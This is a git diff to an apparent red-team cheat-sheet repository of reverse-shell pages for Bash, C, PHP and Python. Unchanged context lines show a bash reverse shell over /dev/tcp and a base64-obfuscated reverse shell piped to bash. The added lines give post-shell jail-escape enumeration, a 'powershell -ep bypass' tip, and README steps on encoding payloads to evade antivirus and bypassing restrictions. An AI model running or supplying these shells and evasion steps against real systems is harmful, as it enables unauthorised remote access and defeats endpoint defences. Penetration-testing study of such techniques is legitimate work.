diff --git a/Script/Red Team/Bash script/Reverse-shell.md b/Script/Red Team/Bash script/Reverse-shell.md index efb8795..f627836 100644 --- a/Script/Red Team/Bash script/Reverse-shell.md +++ b/Script/Red Team/Bash script/Reverse-shell.md @@ -18,3 +18,21 @@ sh -i >& /dev/tcp// 0>&1 ``` ; echo c2ggLWkgPiYgL2Rldi90Y3AvPFlPVVIgSE9TVCBPUiBJUD4vPFBPUlQ+IDA+JjE= | base64 -d | bash;" ``` + +## Tips escape from jails or hardening server + +### Enum about the jail + +``` +echo $SHELL +echo $PATH +env +export +pwd +``` + +Source + +- [Hacktrikcs Escaping from Jails](https://hacktricks.boitatech.com.br/linux-unix/privilege-escalation/escaping-from-limited-bash) +- [Hacktricks github escape from jails](https://github.com/HackTricks-wiki/hacktricks/blob/master/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md) +- [0xffsec restricted-shells](https://0xffsec.com/handbook/shells/restricted-shells/) \ No newline at end of file diff --git a/Script/Red Team/C Script/Reverse-shell.md b/Script/Red Team/C Script/Reverse-shell.md index e99cc5b..fd941c3 100644 --- a/Script/Red Team/C Script/Reverse-shell.md +++ b/Script/Red Team/C Script/Reverse-shell.md @@ -75,10 +75,27 @@ int main(void){ } ``` -*Pro tips +### Enum about the jail + +``` +echo $SHELL +echo $PATH +env +export +pwd +``` + +*Windows Powershell Pro Tips - If you was gett the shell, change to powershell, you can run ``` powershell -ep bypass -``` \ No newline at end of file +``` + +Source + +- [Hacktrikcs Escaping from Jails](https://hacktricks.boitatech.com.br/linux-unix/privilege-escalation/escaping-from-limited-bash) +- [Hacktricks github escape from jails](https://github.com/HackTricks-wiki/hacktricks/blob/master/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md) +- [0xffsec restricted-shells](https://0xffsec.com/handbook/shells/restricted-shells/) +- [Hacktrikcs powershell-for-pentesters](https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters) \ No newline at end of file diff --git a/Script/Red Team/Php scripts/Revershe-shell.md b/Script/Red Team/Php scripts/Revershe-shell.md index f7702d0..23ab6e7 100644 --- a/Script/Red Team/Php scripts/Revershe-shell.md +++ b/Script/Red Team/Php scripts/Revershe-shell.md @@ -18,4 +18,29 @@ https://pastebin.com/bFqVuGwv ```Linux https://pastebin.com/QsSKm2F1 -``` \ No newline at end of file +``` + +### Enum about the jail + +``` +echo $SHELL +echo $PATH +env +export +pwd +``` + +*Windows Powershell Pro Tips + +- If you was gett the shell, change to powershell, you can run + +``` +powershell -ep bypass +``` + +Source + +- [Hacktrikcs Escaping from Jails](https://hacktricks.boitatech.com.br/linux-unix/privilege-escalation/escaping-from-limited-bash) +- [Hacktricks github escape from jails](https://github.com/HackTricks-wiki/hacktricks/blob/master/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md) +- [0xffsec restricted-shells](https://0xffsec.com/handbook/shells/restricted-shells/) +- [Hacktrikcs powershell-for-pentesters](https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters) \ No newline at end of file diff --git a/Script/Red Team/Python scripts/Reverse-shell.md b/Script/Red Team/Python scripts/Reverse-shell.md index 65758b6..ccae2ab 100644 --- a/Script/Red Team/Python scripts/Reverse-shell.md +++ b/Script/Red Team/Python scripts/Reverse-shell.md @@ -35,3 +35,27 @@ port = back_connect(host, port) ``` +### Enum about the jail + +``` +echo $SHELL +echo $PATH +env +export +pwd +``` + +*Windows Powershell Pro Tips + +- If you was gett the shell, change to powershell, you can run + +``` +powershell -ep bypass +``` + +Source + +- [Hacktrikcs Escaping from Jails](https://hacktricks.boitatech.com.br/linux-unix/privilege-escalation/escaping-from-limited-bash) +- [Hacktricks github escape from jails](https://github.com/HackTricks-wiki/hacktricks/blob/master/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md) +- [0xffsec restricted-shells](https://0xffsec.com/handbook/shells/restricted-shells/) +- [Hacktrikcs powershell-for-pentesters](https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters) \ No newline at end of file diff --git a/Script/Red Team/README.md b/Script/Red Team/README.md index 0fb620c..ccfe02d 100644 --- a/Script/Red Team/README.md +++ b/Script/Red Team/README.md @@ -12,5 +12,7 @@ Welcome to path red teaming or pentesting for OSINT, on this path there are scri 6. Check the compiler on the target 7. If AV is detected then you can encode into base64, url encode or try to enumerate what caused the payload to be detected such as checking functions, commands and others. 8. Change the port listener to bigger +9. If there is a restrictions you should to bypass +10. If you have successfully connected with target, swtich to powershell if the Windows, if Linux switch to fully tty shell -## Soon will added (tamplate ) \ No newline at end of file +## Soon will added (tamplate) \ No newline at end of file